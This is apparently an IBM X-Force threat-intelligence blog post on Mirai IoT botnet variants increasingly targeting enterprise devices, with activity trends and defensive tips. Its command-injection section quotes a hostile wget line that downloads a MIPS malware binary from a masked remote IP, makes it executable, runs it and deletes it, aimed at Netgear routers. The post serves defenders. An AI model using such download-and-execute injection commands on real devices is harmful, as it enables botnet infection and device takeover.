I Can’t Believe Mirais: Tracking the Infamous IoT Malware

July 18, 2019
|
co-authored by Joshua Chung, Dave McMillen
|
10 min read

Devices and networks are where cybercriminals go to find data and financial profit. But attacks on simpler connected devices can be devastating in their own ways and cause damage that can be just as complicated to repair and pay for. Historically, simpler internet of things (IoT) devices such as routers and CCTV cameras were most affected, but recent IBM X-Force data indicates that threat actors are increasingly targeting enterprise devices.

The attack landscape has been saturated with attacks against IoT devices since the Mirai botnet was discovered back in 2016. Mirai malware gained notoriety later that year when it was used in a massive distributed denial-of-service (DDoS) attack that brought down a major U.S. dynamic DNS provider, Dyn DNS, with unprecedented force, triggering widespread internet outages in the U.S. and Europe.

Another major Mirai attack in 2016 brought down the Krebs on Security blog site for over four days, costing device owners more than $323,000. Since then, there have been multiple variants of this malware and subsequent botnets focused on enslaving mostly consumer-based devices to perform nefarious tasks, which mostly consist of DDoS attacks and illicit cryptocurrency coin mining.

For enterprise-level network administrators, Mirai malware has been considered more of a nuisance than anything else, given the assumption that the attackers were going after home-based products such as smart home devices, lighting fixtures, thermostats, home security systems and cameras, rather than corporate network endpoints. However, in reality, enterprise networks are also susceptible to DDoS attacks from the Mirai botnet if they host connected devices that are less secure or use default credentials.

Mirai Malware Sharpens Its Focus on Enterprise IoT

IBM X-Force, which has been tracking Mirai campaigns since 2016, has found that the campaign’s tactics, techniques and procedures (TTPs) are now targeting enterprise-level hardware. Mirai operators compete among themselves, with at least 63 Mirai variants observed in 2019 to date. In short, it isn’t just about consumer IoT; enterprise network defenders should also be aware of the risk and take measures to protect IoT devices that may be exploited by Mirai.

Mirai’s Origins and Evolution

Mirai is a self-propagating botnet that was created by Paras Jha, Josiah White and Dalton Norman to compromise IoT devices such as routers and internet-connected cameras, which can then be leveraged in DDoS attacks. The three individuals were subsequently arrested and sentenced by U.S. authorities, but not before releasing the source code to a hacking forum, prompting multiple variants of Mirai to propagate even after the original creators were arrested.

Mirai botnet operators traditionally went after consumer-grade IoT devices, such as internet-connected webcams and baby monitors. However, this appears to be changing as attacker motivations evolve, likely owing to the rise of IoT devices for innovation and efficiency in the enterprise.

Nowadays, enterprise IoT devices are everywhere, from instruments that monitor patients in hospitals, to wireless devices in smart meters that relay information to utility companies, to robots in warehouses that constantly deliver inventory information. Enterprises are increasingly dependent on IoT devices to run day-to-day operations, and attackers are well-aware of the growing attack surface.

Fast-forward to 2019, and Mirai’s evolution is gravitating toward changes in enterprise IT operations, extending its attack surface and bringing new zero-day exploits to consumer-level devices:

  • Mirai botnets are becoming more potent as different payloads are used to target a wider set of victims and various types of hardware.
  • There is an increasing emergence of Mirai-like botnets mimicking the original infection technique and aiming to infect ever more prevalent IoT devices.
  • In February 2019, researchers discovered new Mirai samples that were compiled to attack new processors and architectures. Similar to the other researchers’ discovery, in March 2019, IBM X-Force found a Mirai-like botnet aimed at enterprise IoT devices. These attacks were seen dropping cryptocurrency miners and backdoors onto affected devices.

These developments suggest that the Mirai malware and its variants are evolving with their operator’s intents, delivering a variety of exploits and increasingly aimed against enterprise environments. As IoT devices become more common among households and large organizations, Mirai and its variants will continue to evolve to adapt to the changing environments and targets of its choice.

Variant Capabilities

X-Force researchers have observed Mirai and its variants dropping additional malware payloads onto infected devices, with cryptocurrency miners leading the way. Cryptominers can be very effective at monetizing access as they leverage the computing power of infected IoT devices to generate money for the bad guys, even at the cost of damaging overheating devices that have little computing power compared to actual central processing unit (CPU) and graphics processing unit (GPU) resources. In addition, researchers spotted threat actors dropping a C99Shell, a PHP-based reverse backdoor shell, which mirrors historical tactics used by Mirai botnet operators. More creative threat actors were observed delivering payloads via steganography, hiding malicious code in images to trigger the download of subsequent payloads.

The expansion of the Mirai family of payloads beyond simple reverse shells is worrisome because it allows threat actors to quickly download any number of malicious files onto a large number of IoT devices. This development is compounded by the fact that many IoT devices are treated as fire-and-forget: Once initially set up, IoT devices are not monitored or checked for abnormal behavior, meaning an infected device could be operating for a significant period of time before issues are ever detected. Thus, as threat actors continue to build out the ability of Mirai variants to drop new payloads, the danger is likely to increase.

Mirai Malware Variants Deploy Using Command Injection

On the technical side, X-Force researchers have been seeing Mirai’s operators widely distribute the bots by using command injection attacks and leveraging a Wget command, then altering permissions to allow the threat actor to interact with the target system.

Wget is a free software that retrieves files using multiple protocols, including HTTP, HTTPS, FTP, FTPS. It is frequently found in enterprise environments for convenient remote download and administration. Unfortunately, Wget’s capabilities are widely used by malicious actors to force a target device to download a file without interacting with the victim. That’s one way to make IoT devices browse to an infection zone and fetch a malicious payload in an automated way. This is the exact same tactic attackers use to deliver new Mirai-like botnet malware.

The following example is a command deployed on a MIPS architecture — the sort of operating system that is typically embedded into IoT devices, especially routers:

wget http://xxx.xx.xxx.xxx/bins/malware.mips -o /var/tmp/malware.mips; chmod 777 /var/tmp/malware.mips; /var/tmp/malware.mips; rm -rf /var/tmp/malware.mipsnext_file%3dnetgear.cfg

In this example, if the host were vulnerable to command injection, this command would have downloaded and executed a file called malware.mips. The .mips file extension provides an indication that the attacker is targeting a device that is operating on MIPS architecture.

The malware in this example is an Executable and Linkable Format (ELF) file, which is generally used by machines running reduced instruction set computer (RISC) architecture. RISC architecture, like MIPS, is prevalent on many IoT devices.

In this specific case, once downloaded, the malware includes additional instructions that output the file to the local device’s /var/tmp directory, which then changes the file permissions of that local file and the parent directory to global (chmod 777). This grants full read/write/execute permissions to all users, including the attacker, who may wish to modify the folder or file contents, which could be ultimately handy if they wish to perpetrate other attack types on this target. This action also creates a persistence condition on the victim host, which would allow the malware to reload if the device is rebooted.

The malware was then executed and deleted from var/tmp to defeat detection. In this case, the threat actors used the malware.mips file to exploit a known vulnerability in Netgear routers that allowed them to gain administrative access to the device. This type of attack is known as a remote authentication bypass. With full access to the device, the attacker could modify the firmware and plant additional malware.

Although this particular example cites a well-known threat vector that has already been patched, it continues to be effective for two main reasons. For one thing, new vulnerabilities allow threat actors to frequently update exploits, and slow patch implementation allows attackers to exploit vulnerabilities that have already been patched. Secondly, this activity is easily automated, allowing threat actors to hit a broad swath of devices very quickly and at very low cost. Ease of use and continued vulnerability make the above example a tried-and-true method that attackers continue to leverage in campaigns targeting IoT devices.

A successful command injection attack can allow an attacker to issue arbitrary commands within a vulnerable web application environment. This can happen when an application passes malicious user-supplied input via forms, cookies or HTTP headers to a system shell. If the data input is not validated properly, the attacker can inject additional shell commands and have them executed with the permission of the vulnerable application. Simply put, this means a critical web server and its entire back-end database can be compromised via this common tactic alone.

Recent Mirai Activity: Busier Than Ever

IBM X-Force researchers observed a sharp uptick in Mirai activity, with a spiking starting in November 2018. Mirai activity nearly doubled between the first quarter of 2018 and the first quarter of 2019. The graph below represents the percentage of all observed Mirai attacks by month for the last 12 months, as monitored by X-Force research.

Figure 1: Mirai botnet activity over the last 12 months (Source: IBM X-Force)

The frequency of Mirai activity over the last year has significantly increased, with a much greater percentage of the overall number of Mirai-like attacks occurring in the last quarter of 2018 and first two quarters of 2019. The rise in attacks corresponds to the interest threat actors have in deploying Mirai for disruption and financial profit alike.

Rising IoT Botnets

Compared to other botnets that target IoT devices, Mirai and variants of Mirai are by far the most popular malware to hit enterprise networks in 2019 to date, according to X-Force research data.

In fact, Mirai variants were observed more than twice as frequently as the next most popular Mirai-like botnet, Gafgyt. The prevalence of Mirai underscores the utility threat actors perceive it to have and their ability to leverage its capabilities in targeting IoT devices, exploiting vulnerabilities and creating powerful DDoS attacks.

The install base of connected devices is expected to reach more than 31 billion devices by 2020. The popularity of the IoT is forecast to proliferate both in business and consumer spaces as the IoT market is on pace to grow to $3 trillion by 2026.

But as IoT devices proliferate, so does the risk associated with their deployment due to the wider attack surface these additional devices create. On large networks, IoT devices are sometimes deployed as shiny new equipment but are then neglected, missing regular maintenance such as monitoring and updating firmware, and left with nothing but default passwords as a layer of protection from external intrusion. Additionally, these devices are always on and may be interfacing with critical systems within a network, creating the potential to cause significant network disruption if the organization is compromised in large numbers.

The graph below shows the top IoT botnet families most active in the wild this year. The “Mirai Variant” category in the graph contains nearly 63 different variants of the Mirai botnet.

Figure 2: IoT botnet activity by family (Source: IBM X-Force)

Most Targeted: Information and Insurance Services

The graph below represents the top five industries targeted by Mirai variants based on X-Force research telemetry. Over 80 percent of all observed botnet activity targeted the media (specifically, information services) and insurance industries. These industries could be seeing higher focus from IoT botnets because they have a larger overall footprint or because they may have a larger geographic distribution, significant IoT usage or propensity for early technology adoption.

Due to the volume of the observed botnet targeting, it is unlikely that this activity is specifically targeted and is more likely automated to target as many devices as possible. The same strategy is known from previous Mirai attacks that were highly opportunistic in the way they spread.

Figure 3: Industries affected by Mirai (Source: IBM X-Force)

New Players Make a Splash

While Mirai is the more prolific threat to IoT devices, threat actors continue to develop new Mirai variants and IoT botnet malware outside of the Mirai family to target IoT devices.

A threat actor group called Shaolin, for example, has been primarily targeting consumer brand routers, specifically Netgear and D-Link routers. Samples for Shaolin reach back to December 2018 and appear to be cobbled together from the code of multiple botnet variants, including Mirai. Some researchers have suggested that it is part of a larger group of bots called Cayosin. An Instagram user with the alias “unholdable” was spotted selling access to the Cayosin malware in early 2019, posting videos of how to purchase and use its botnet services.

Another IoT-targeting malware family, Gafgyt, represented 27 percent of all observed instances of IoT targeting so far in 2019, according to X-Force data. Gafgyt is a relative newcomer to the IoT botnet marketplace, having emerged in late 2017, and was created in part from the released Mirai source code. It uses password brute-forcing with a pregenerated list of passwords to infect devices. Gafgyt historically targeted Linux-based devices, unlike Mirai, which targets a broader set of devices.

Potential Impact to Cloud Computing

IoT devices connected to cloud architecture could allow Mirai adversaries to gain access to cloud servers. They could infect a server with additional malware dropped by Mirai or expose all IoT devices connected to the server to further compromise. As organizations increasingly adopt cloud architecture to scale efficiency and productivity, disruption to a cloud environment could be catastrophic.

For enterprises that are rapidly adopting both IoT technology and cloud architecture, insufficient security controls could expose the organization to elevated risk, calling for the security committee to conduct an up-to-date risk assessment.

Where Will Mirai Go Next?

As the world of connected devices gallops forward, IoT botnets are not going anywhere. Though they have quieted down a bit since 2016, their recent resurgence indicates that threat actors are still finding this particular malware type profitable.

Since this activity is highly automated, there remains a strong possibility of large-scale infection of IoT devices in the future. Additionally, threat actors are continuing to expand their targets to include new types of IoT devices and may start looking at industrial IoT devices or connected wearables to increase their footprint and profits.

Tips to Defend Against IoT Malware

While IoT malware is rampant, the most popular versions rely on automated attacks that can be prevented with the right security practices and controls in place. Organizations should take the following steps to better protect themselves against evolving threats like Mirai:

  • Inventory all IoT assets on a regular basis and ensure that they are serving a legitimate business purpose:
    • Ensure all devices are compliant with corporate policies, including patching and password requirements.
    • For organizations with a significant IoT footprint, engage in regular penetration testing to confirm the presence of IoT devices and that they meet security standards.
  • Change all default passwords on IoT devices. If passwords cannot be changed, segregate the IoT network and place mitigating controls around these device networks.
  • Restrict public internet access to IoT devices by placing them behind firewalls and other network defenses.
  • Monitor for unexpected outbound Wget or PowerShell requests that may be attempting to pull malicious payloads on to your IoT devices.
  • Secure IoT applications in all interactions, from the back-end servers processing device operations to communications with front-end user devices.
  • Ensure IoT device interactions are encrypted and authenticated across the board.
  • Use threat intelligence to monitor current threat trends for the latest tactics, techniques and procedures threat actors are using to compromise IoT devices.
  • Restrict outbound activity for IoT devices that do not require external access.

IoCs for this blog can be found in a technical collection on IBM X-Force Exchange.

Charles DeBeck
Senior Cyber Threat Intelligence Analyst - IBM

Charles DeBeck is a senior cyber threat intelligence strategic analyst with IBM X-Force Incident Response and Intelligence Services (IRIS). Charles brings 7 ...
read more